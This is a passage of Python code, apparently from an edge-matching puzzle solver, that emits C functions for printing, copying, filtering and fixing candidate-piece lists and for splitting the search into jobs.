\"f_out,\"\n\n\t\t\t# ----------------------------------\n\t\t\tfor dest in [ \"\", \"_for_stats\" ]:\n\n\t\t\t\toutput.extend( [ \n\t\t\t\t\t(0, \"void \"+prefix+\"PrintValidPieces\"+dest+\"(\"),\n\t\t\t\t\t(1, \"charp s_out,\" if (prefix == \"s\") else \"\" ),\n\t\t\t\t\t(1, \"FILE * f_out,\" if (prefix == \"f\") else \"\" ),\n\t\t\t\t\t(1, \"t_piece_full * valid_pieces\"),\n\t\t\t\t\t] )\n\n\t\t\t\tif only_signature:\n\t\t\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\toutput.extend( [\n\t\t\t\t\t(1, \") {\"),\n\t\t\t\t\t(1, \"uint64 space, x, y, piece_index;\"),\n\t\t\t\t\t(1, \"int64 count, total;\"),\n\t\t\t\t\t(1, \"uint64 space_count[WH];\"),\n\t\t\t\t\t(0, ''), \n\t\t\t\t\t(1, 'if (valid_pieces == NULL) {' ),\n\t\t\t\t\t(2, 'printf(\"NULL: Nothing to print\\\\n\");' ),\n\t\t\t\t\t(1, 'return;' ),\n\t\t\t\t\t(1, '}' ),\n\t\t\t\t\t(1, 'total = 0;' ),\n\t\t\t\t\t(0, ''), \n\t\t\t\t\t(1, 'for (space = 0; space < WH; space++) {' ),\n\t\t\t\t\t(2, 'space_count[space] = 0;' ),\n\t\t\t\t\t(2, 'while (valid_pieces[space*WH*4+space_count[space]].u != 0xff) { space_count[space]++; }' ),\n\t\t\t\t\t(2, 'total += space_count[space];' ),\n\t\t\t\t\t(1, '}' ),\n\t\t\t\t\t] )\n\n\t\t\t\tif dest == \"\":\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, 'for (y = 0; y < H; y++) {' ),\n\t\t\t\t\t\t(2, 'for (x = 0; x < W; x++) {' ),\n\t\t\t\t\t\t(3, 'count = space_count[ x+(y*W) ];' ),\n\t\t\t\t\t\t(3, 'if (count <= 0) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\" . \" );' ),\n\t\t\t\t\t\t] )\n\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, '} else if (count < 1000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"'+self.verdoie +\"%3llu\"+self.XTermNormal+' \", count/1);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.jaunoie +\"%3llu\"+self.XTermNormal+' \", count/1000);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.rougeoie+\"%3llu\"+self.XTermNormal+' \", count/1000000);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.violoie +\"%3llu\"+self.XTermNormal+' \", count/1000000000);' ),\n\t\t\t\t\t\t(3, '} else if (count < 1000000000000000) {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"'+self.bleuoie +\"%3llu\"+self.XTermNormal+' \", count/1000000000000);' ),\n\t\t\t\t\t\t] )\n\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(3, '} else {' ),\n\t\t\t\t\t\t(4, prefix+'printf( '+out+'\"%3llu \", count);' ),\n\t\t\t\t\t\t(3, '}' ),\n\t\t\t\t\t\t(2, '} // x' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t(1, '} // y' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t(1, 'if (total == 0) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: . '+uname+'\\\\n\\\\n\" );' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.verdoie +\"%3llu\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.jaunoie +\"%3lluK\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.rougeoie+\"%3lluM\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000000);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.violoie +\"%3lluG\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000000000);' ),\n\t\t\t\t\t\t(1, '} else if (total < 1000000000000000) {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: '+self.bleuoie +\"%3lluT\"+self.XTermNormal+' '+uname+'\\\\n\\\\n\", total/1000000000000);' ),\n\t\t\t\t\t\t(1, '} else {' ),\n\t\t\t\t\t\t(2, prefix+'printf( '+out+'\"Total: %3llu '+uname+'/s\\\\n\\\\n\", total);' ),\n\t\t\t\t\t\t(1, '}' ),\n\t\t\t\t\t\t])\n\n\t\t\t\telif dest == \"_for_stats\":\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, 'for (y = 0; y < H; y++) {' ),\n\t\t\t\t\t\t(2, 'for (x = 0; x < W; x++) {' ),\n\t\t\t\t\t\t(3, 'count = space_count[ x+(y*W) ];' ),\n\t\t\t\t\t\t(3, prefix+'printf( '+out+'\"%llu \", count);' ),\n\t\t\t\t\t\t(2, '} // x' ),\n\t\t\t\t\t\t(1, '} // y' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"Total: %llu '+uname+'/s\\\\n\", total );' ),\n\t\t\t\t\t\t])\n\n\t\t\t\telse:\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, 'for (y = 0; y < H; y++) {' ),\n\t\t\t\t\t\t(2, 'for (x = 0; x < W; x++) {' ),\n\t\t\t\t\t\t(3, 'count = space_count[ x+(y*W) ];' ),\n\t\t\t\t\t\t(3, prefix+'printf( '+out+'\"%llu \", count);' ),\n\t\t\t\t\t\t(2, '} // x' ),\n\t\t\t\t\t\t(1, '} // y' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t#(1, prefix+'printf( '+out+'\"Total: %llu '+uname+'/s\\\\n\", total );' ),\n\t\t\t\t\t\t])\n\n\n\t\t\t\toutput.extend( [\n\t\t\t\t\t(1, 'fflush(stdout);' if prefix == \"\" else \"\"), \n\t\t\t\t\t(0, '}' ),\n\t\t\t\t\t(0, ''), \n\t\t\t\t\t] )\n\n\n\t\treturn output\n\n\t# ----- Allocate\n\tdef gen_AllocateValidPieces_function( self, only_signature=False ):\n\t\t\n\t\toutput = [ \n\t\t\t(0, \"t_piece_full * AllocateValidPieces(\"),\n\t\t\t(1, \"p_bigpicture bigpicture\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"bigpicture->stats_allocate++;\"),\n\t\t\t(1, 'return (t_piece_full *)(malloc(sizeof(t_piece_full)*WH*WH*4));' ),\n\t\t\t(1, \"\"),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- Copy\n\tdef gen_CopyValidPieces_function( self, only_signature=False ):\n\t\t\n\t\toutput = [ \n\t\t\t(0, \"t_piece_full * CopyValidPieces(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"t_piece_full * src_valid_pieces,\"),\n\t\t\t(1, \"t_piece_full * dst_valid_pieces\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 piece_index;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'if (src_valid_pieces == NULL) ' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, 'if (dst_valid_pieces == NULL) ' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"bigpicture->stats_copy++;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'for (space=0; spacestats_filter_valid_pieces++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, 'for (space=0; space= W) { local_patterns.u = patterns_seen[space-W].d; }'), \n\t\t\t(3, 'if ((space % W) != (W-1)) { local_patterns.r = patterns_seen[space+1].l; }'), \n\t\t\t(3, 'if (space < (WH-W)) { local_patterns.d = patterns_seen[space+W].u; }'), \n\t\t\t(3, 'if ((space % W) != 0 ) { local_patterns.l = patterns_seen[space-1].r; }'), \n\t\t\t(3, '' ),\n\t\t\t(3, 'piece_index = space*WH*4;' ),\n\t\t\t(3, 'dst_piece_index = space*WH*4;' ),\n\t\t\t(3, 'while (current_valid_pieces[piece_index].u != 0xff) {' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'if ( (local_patterns.u & (1 << current_valid_pieces[piece_index].u)) &&' ),\n\t\t\t(4, ' (local_patterns.r & (1 << current_valid_pieces[piece_index].r)) &&' ),\n\t\t\t(4, ' (local_patterns.d & (1 << current_valid_pieces[piece_index].d)) &&' ),\n\t\t\t(4, ' (local_patterns.l & (1 << current_valid_pieces[piece_index].l)) ) {' ),\n\t\t\t(5, 'result_valid_pieces[dst_piece_index] = current_valid_pieces[piece_index];' ), \n\t\t\t(5, 'dst_piece_index++;' ),\n\t\t\t(4, '} else {' ),\n\t\t\t(5, 'removed++;' ),\n\t\t\t(5, 'space_needs_refresh[space] = 1;' ),\n\t\t\t(4, '}' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'piece_index++;' ),\n\t\t\t(3, '} // while' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '// If nothing is copied, it is a deadend' ),\n\t\t\t(3, 'if (dst_piece_index == space*WH*4) {' ),\n\t\t\t#(4, 'printf(\"Filter Pieces deadend on space %lld\\\\n\", space);' ),\n\t\t\t(4, \"bigpicture->stats_filter_valid_pieces_dead_end ++;\"),\n\t\t\t(4, 'free(result_valid_pieces);' ),\n\t\t\t(4, 'return NULL;' ),\n\t\t\t(3, '}' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '// Copy 0xff marker at the end of the list' ),\n\t\t\t(3, 'result_valid_pieces[dst_piece_index] = current_valid_pieces[piece_index];' ), \n\t\t\t(3, '' ),\n\t\t\t(2, '} // For space' ),\n\t\t\t(2, '' ),\n\t\t\t(2, '// If we need to go again, we copy into tmp_valid_pieces to use it as the new source' ),\n\t\t\t(2, 'if (removed > 0) {' ),\n\t\t\t(3, 'current_valid_pieces = tmp_valid_pieces;' ),\n\t\t\t(3, 'CopyValidPieces(bigpicture, result_valid_pieces, tmp_valid_pieces);' ),\n\t\t\t(2, '}' ),\n\t\t\t(2, '' ),\n\t\t\t(2, \"bigpicture->stats_filter_valid_pieces_removed++;\"),\n\t\t\t(1, '} // While removed' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, \"\"),\n\t\t\t(1, 'return result_valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- Filter based on edges/patterns the valid_pieces list\n\tdef gen_FilterValidPiecesOverwrite_function( self, only_signature=False ):\n\t\t\n\t\toutput = []\n\t\toutput.extend( [\n\t\t\t(0, \"p_piece_full FilterValidPiecesOverwrite(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"uint64 removed;\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 src_piece_index, dst_piece_index;\"),\n\t\t\t(1, \"t_piece_full piece;\"),\n\t\t\t(1, \"uint8 space_needs_refresh[WH];\"),\n\t\t\t(1, \"t_patterns_seen patterns_seen[WH];\"),\n\t\t\t(1, \"t_patterns_seen local_patterns;\"),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, 'if (valid_pieces == NULL) return NULL;' ),\n\t\t\t(1, '' ),\n\t\t\t(1, \"bigpicture->stats_filter_valid_pieces++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, 'for (space=0; space= W) { local_patterns.u = patterns_seen[space-W].d; }'), \n\t\t\t(3, 'if ((space % W) != (W-1)) { local_patterns.r = patterns_seen[space+1].l; }'), \n\t\t\t(3, 'if (space < (WH-W)) { local_patterns.d = patterns_seen[space+W].u; }'), \n\t\t\t(3, 'if ((space % W) != 0 ) { local_patterns.l = patterns_seen[space-1].r; }'), \n\t\t\t(3, '' ),\n\t\t\t(3, 'src_piece_index = space*WH*4;' ),\n\t\t\t(3, 'dst_piece_index = space*WH*4;' ),\n\t\t\t(3, 'while (valid_pieces[src_piece_index].u != 0xff) {' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'if ( (local_patterns.u & (1 << valid_pieces[src_piece_index].u)) &&' ),\n\t\t\t(4, ' (local_patterns.r & (1 << valid_pieces[src_piece_index].r)) &&' ),\n\t\t\t(4, ' (local_patterns.d & (1 << valid_pieces[src_piece_index].d)) &&' ),\n\t\t\t(4, ' (local_patterns.l & (1 << valid_pieces[src_piece_index].l)) ) {' ),\n\t\t\t(5, 'valid_pieces[dst_piece_index] = valid_pieces[src_piece_index];' ), \n\t\t\t(5, 'dst_piece_index++;' ),\n\t\t\t(4, '} else {' ),\n\t\t\t(5, 'removed++;' ),\n\t\t\t(5, 'space_needs_refresh[space] = 1;' ),\n\t\t\t(4, '}' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'src_piece_index++;' ),\n\t\t\t(3, '} // while' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '// Copy 0xff marker at the end of the list' ),\n\t\t\t(3, 'valid_pieces[dst_piece_index] = valid_pieces[src_piece_index];' ), \n\t\t\t(3, '' ),\n\t\t\t(3, '// If nothing is copied, it is a deadend' ),\n\t\t\t(3, 'if (dst_piece_index == space*WH*4) {' ),\n\t\t\t#(4, 'printf(\"Filter Pieces deadend on space %lld\\\\n\", space);' ),\n\t\t\t(4, \"bigpicture->stats_filter_valid_pieces_dead_end ++;\"),\n\t\t\t(4, 'return NULL;' ),\n\t\t\t(3, '}' ),\n\t\t\t(2, '} // For space' ),\n\t\t\t(2, '' ),\n\t\t\t(2, \"bigpicture->stats_filter_valid_pieces_removed++;\"),\n\t\t\t(1, '} // While removed' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, 'return valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- Fix one Piece\n\tdef gen_FixPieces_function( self, only_signature=False ):\n\t\n\t\toutput = []\n\n\t\toutput.extend( [\n\t\t\t(0, \"t_piece_full * FixPieces(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces,\"),\n\t\t\t(1, \"uint64 piece_number,\"),\n\t\t\t(1, \"uint64 piece_space,\"),\n\t\t\t(1, \"uint64 piece_rotation\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 piece_index, dst_piece_index;\"),\n\t\t\t(1, \"\" ),\n\t\t\t(1, \"t_piece_full * dst_valid_pieces;\" ),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'if (valid_pieces == NULL) ' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, '' ),\n\t\t\t(1, \"bigpicture->stats_fix_pieces ++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, \"dst_valid_pieces = AllocateValidPieces(bigpicture);\"),\n\t\t\t(1, 'for (space=0; spacestats_fix_pieces_dead_end ++;\"),\n\t\t\t(3, 'free(dst_valid_pieces);'),\n\t\t\t(3, 'return NULL;' ),\n\t\t\t(2, '}' ),\n\t\t\t(1, '} // For space' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, \"\"),\n\t\t\t(1, 'return dst_valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\t\n\t# ----- Fix one Piece\n\tdef gen_FixPiecesOverwrite_function( self, only_signature=False ):\n\t\n\t\toutput = []\n\t\toutput.extend( [\n\t\t\t(0, \"t_piece_full * FixPiecesOverwrite(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces,\"),\n\t\t\t(1, \"uint64 piece_number,\"),\n\t\t\t(1, \"uint64 piece_space,\"),\n\t\t\t(1, \"uint64 piece_rotation\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 src_piece_index, dst_piece_index;\"),\n\t\t\t(1, \"\" ),\n\t\t\t(1, 'if (valid_pieces == NULL)' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, '' ),\n\t\t\t(1, \"bigpicture->stats_fix_pieces ++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, 'for (space=0; spacestats_fix_pieces_dead_end ++;\"),\n\t\t\t(3, 'return NULL;' ),\n\t\t\t(2, '}' ),\n\t\t\t(1, '} // For space' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, \"\"),\n\t\t\t(1, 'return valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\t\n\t# ----- get the jobs\n\tdef gen_getJobs_function( self, only_signature=False ):\n\t\t\n\t\toutput = [ \n\t\t\t(0, \"p_job getJobs(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces,\"),\n\t\t\t(1, \"p_piece_fixed pre_fixed,\"),\n\t\t\t(1, \"uint64 max_width,\"),\n\t\t\t(1, \"uint64 max_height\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(2, \"t_piece_full * current_valid_pieces;\" ),\n\t\t\t(2, \"t_piece_full * new_valid_pieces;\" ),\n\t\t\t(2, \"uint64 i;\"),\n\t\t\t(2, \"uint64 depth;\"),\n\t\t\t(2, \"uint64 orientation;\"),\n\t\t\t(2, \"uint64 space;\"),\n\t\t\t(2, \"uint64 piece_index;\"),\n\t\t\t(2, \"uint64 new_column_width[16384];\"),\n\t\t\t(2, \"uint64 new_line_height[16384];\"),\n\t\t\t(2, \"uint64 new_column_position[16384];\"),\n\t\t\t(2, \"uint64 new_line_position[16384];\"),\n\t\t\t(2, \"uint64 width[WH+1];\"),\n\t\t\t(2, \"uint64 height[WH+1];\"),\n\t\t\t(2, \"t_job * all_jobs[WH+1];\"),\n\t\t\t(2, \"t_job first_job[2];\"),\n\t\t\t(2, \"uint64 jobs_index;\"),\n\t\t\t(2, \"uint64 previous_jobs_index;\"),\n\t\t\t(2, \"uint64 lowest_valid_pieces;\"),\n\t\t\t(2, \"uint64 best_space;\"),\n\t\t\t(2, \"uint64 len_valid_pieces;\"),\n\t\t\t(2, \"uint64 shift_x;\"),\n\t\t\t(2, \"uint64 shift_y;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'FILE * output;' ),\n\t\t\t(1, 'FILE * jobsfile;' ),\n\t\t\t(1, 'uint8 was_allocated;' ),\n\t\t\t(1, 'uint8 TTF;' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'was_allocated = 0;' ),\n\t\t\t(1, 'if (bigpicture == NULL) {' ),\n\t\t\t(2, 'bigpicture = (p_bigpicture)allocate_bigpicture();'), \n\t\t\t(2, 'was_allocated = 1;' ),\n\t\t\t#(2, 'xorCommands(bigpicture, SHOW_STATS);' ),\n\t\t\t(1, '}'), \n \t\t\t(2, \"bigpicture->commands |= CLEAR_SCREEN;\"),\n \t\t\t(2, \"bigpicture->commands |= SHOW_STATS;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'TTF=0;' ),\n\t\t\t(1, '' ),\n\t\t\t(2, \"\"),\n\t\t\t(1, '// Output' ),\n\t\t\t(1, 'output = stdout;' ),\n\t\t\t#(1, 'if (thread_output_filename != NULL) {' ),\n\t\t\t#(2, 'output = fopen( thread_output_filename, \"a\" );' ),\n\t\t\t#(2, 'if (!output) { printf(\"Can\\'t open %s\\\\n\", thread_output_filename); return -1; }' ),\n\t\t\t#(1, '}' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"\"),\n\t\t\t(2, 'if (valid_pieces == NULL) ' ),\n\t\t\t#(3, 'return NULL;' ),\n\t\t\t(3, 'valid_pieces = static_valid_pieces;' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"\"),\n\t\t\t(2, \"// Depth goes from -1 to WH, so we adjust with +1\"),\n\t\t\t(2, \"depth = \"+str(len(self.puzzle.extra_fixed+self.puzzle.fixed))+\";\"), #TODO\n\t\t\t(2, \"depth += 1;\"),\n\t\t\t(2, '' ),\n\t\t\t(2, '// Starting point' ),\n\t\t\t(2, \"first_job[0].x = 0;\"),\n\t\t\t(2, \"first_job[0].y = 0;\"),\n\t\t\t(2, \"first_job[0].valid_pieces = valid_pieces;\"),\n\t\t\t(2, \"first_job[1].x = 0xffffffff; // Marks the end of the list\"),\n\t\t\t(2, \"all_jobs[depth-1] = first_job;\"),\n\t\t\t(2, \"width[depth-1] = 1;\"),\n\t\t\t(2, \"height[depth-1] = 1;\"),\n\t\t\t(2, \"\"),\n\t\t\t(2, \"\"),\n\t\t\t(2, \"while ((depth < WH+1)&&!TTF) {\"),\n\t\t\t(2, \"\"),\n\t\t\t(3, \"orientation = depth % 2;\"),\n\t\t\t(3, \"width[depth] = 0;\"),\n\t\t\t(3, \"height[depth] = 0;\"),\n\t\t\t(3, \"all_jobs[depth] = (t_job *)(malloc(sizeof(t_job)*16384*16384));\"),\n\t\t\t(3, \"jobs_index = 0;\"),\n\t\t\t(3, \"for(i=0; i<16384; i++){\"),\n\t\t\t(4, \"new_column_width[i] = 1;\"),\n\t\t\t(4, \"new_line_height[i] = 1;\"),\n\t\t\t(3, \"}\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"previous_jobs_index = 0;\"),\n\t\t\t(3, \"while ((all_jobs[depth-1][previous_jobs_index].x != 0xffffffff)&&!TTF) {\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"if (bigpicture != NULL) {\"),\n\t\t\t(5, 'if (bigpicture->check_commands) {'),\n\t\t\t(6, 'bigpicture->check_commands = 0;'),\n\t\t\t(6, 'fdo_commands(output, bigpicture);' ),\n\t\t\t(6, 'TTF = getTTF(bigpicture);' ),\n\t\t\t(5, \"}\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"current_valid_pieces = all_jobs[depth-1][previous_jobs_index].valid_pieces;\"),\n\t\t\t(4, \"lowest_valid_pieces = WH*4;\"),\n\t\t\t(4, \"best_space = WH*4;\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, 'for (space=0; space 1) {\"),\n\t\t\t(6, \"if (len_valid_pieces < lowest_valid_pieces) {\"),\n\t\t\t(7, \"lowest_valid_pieces = len_valid_pieces;\"),\n\t\t\t(7, \"best_space = space;\"),\n\t\t\t(6, \"}\"),\n\t\t\t(5, \"}\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"if (best_space == WH*4) {\"),\n\t\t\t(5, 'printf(\"No best_space found, continuing\\\\n\");'),\n\t\t\t(5, \"continue; // While all_jobs\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"shift_x = 0;\"),\n\t\t\t(4, \"shift_y = 0;\"),\n\t\t\t(4, 'piece_index = best_space*WH*4;' ),\n\t\t\t(4, 'while ((current_valid_pieces[piece_index].u != 0xff)&&!TTF) {' ),\n\t\t\t(5, \"new_valid_pieces = FilterValidPiecesOverwrite( bigpicture, FixPieces( bigpicture, current_valid_pieces, current_valid_pieces[piece_index].number, best_space, current_valid_pieces[piece_index].rotation));\"),\n\t\t\t(5, \"if (new_valid_pieces != NULL) {\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].x = all_jobs[depth-1][previous_jobs_index].x;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].y = all_jobs[depth-1][previous_jobs_index].y;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].shift_x = shift_x;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].shift_y = shift_y;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].valid_pieces = new_valid_pieces;\"),\n\t\t\t(6, \"if (orientation == 0) {\"),\n\t\t\t(7, \"shift_x++;\"),\n\t\t\t(7, \"if (shift_x > new_column_width[ all_jobs[depth-1][previous_jobs_index].x ])\"),\n\t\t\t(8, \"new_column_width[ all_jobs[depth-1][previous_jobs_index].x ] = shift_x;\"),\n\t\t\t(6, \"} else {\"),\n\t\t\t(7, \"shift_y++;\"),\n\t\t\t(7, \"if (shift_y > new_line_height[ all_jobs[depth-1][previous_jobs_index].y ])\"),\n\t\t\t(8, \"new_line_height[ all_jobs[depth-1][previous_jobs_index].y ] = shift_y;\"),\n\t\t\t(6, \"}\"),\n\t\t\t(6, \"jobs_index++;\"),\n\t\t\t(5, \"} // new_valid_pieces\"),\n\t\t\t(5, \"piece_index ++;\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"previous_jobs_index ++;\"),\n\t\t\t(3, \"} // While all_jobs\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"all_jobs[depth][jobs_index].x = 0xffffffff; // Marks the end of the list\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"if (!TTF) {\"),\n\t\t\t(4, \"// Adjust the coordinates\"),\n\t\t\t(4, \"new_column_position[0] = 0;\"),\n\t\t\t(4, \"for (i=0; i %lld\\\\n\", depth, width[depth], height[depth], jobs_index);' ),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"// Write jobs\"),\n\t\t\t(4, 'jobsfile = fopen( \"jobs/'+self.getFileFriendlyName( self.puzzle.name )+'_output.txt\", \"a\" );' ),\n\t\t\t(4, 'if (!jobsfile) { printf(\"Can\\'t open %s\\\\n\", \"jobs/'+self.getFileFriendlyName( self.puzzle.name )+'_output.txt\"); return NULL; }' ),\n\t\t\t(4, \"jobs_index = 0;\"),\n\t\t\t(4, \"while ((all_jobs[depth][jobs_index].x != 0xffffffff)&&!TTF) {\"),\n\t\t\t(5, 'fprintf(jobsfile, \"%lld_%lld_%lld|[\", depth, all_jobs[depth][jobs_index].x, all_jobs[depth][jobs_index].y);'),\n\t\t\t(5, 'for (space=0; space max_width) && (height[depth] > max_height)) break;\"),\n\t\t\t(3, \"}\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"depth ++;\"),\n\t\t\t(2, \"} // While Depth\"),\n\n\t\t\t(1, 'if (output != stdout) {' ),\n\t\t\t(2, 'fclose(output);' ),\n\t\t\t(1, '}' ),\n\n\t\t\t(1, 'if (was_allocated) {'), \n\t\t\t(2, 'free_bigpicture(bigpicture);'), \n\t\t\t(2, 'bigpicture = NULL;'), \n\t\t\t(1, '}'), \n\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, \"\"),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- \n\tdef getJobsinPython( self, valid_pieces, pre_fixed=[], max_width=1024, max_height=1024):\n\n\t\tif valid_pieces == None:\n\t\t\treturn None\n\n\t\twidth = {}\n\t\theight = {}\n\n\t\tall_valid_pieces = {}\n\t\tcurrent_valid_pieces = valid_pieces\n\n\t\t#for x in pre_fixed:\n\t\t#\tcurrent_valid_pieces = self.fixPiece( current_valid_pieces ....)\n\n\t\t#depth = len(self.puzzle.extra_fixed+self.puzzle.fixed+pre_fixed)\n\t\t#new_valid_\n\n\t\tdepth = len(self.puzzle.extra_fixed+self.puzzle.fixed)\n\n\t\tall_valid_pieces[ depth-1 ] = [ (0, 0, current_valid_pieces) ]\n\t\twidth[ depth-1 ] = 1\n\t\theight[ depth-1 ] = 1\n\n\t\twhile depth < self.puzzle.board_wh:\n\n\t\t\torientation = depth % 2\n\t\t\twidth[ depth ] = 0\n\t\t\theight[ depth ] = 0\n\t\t\tall_valid_pieces[ depth ] = 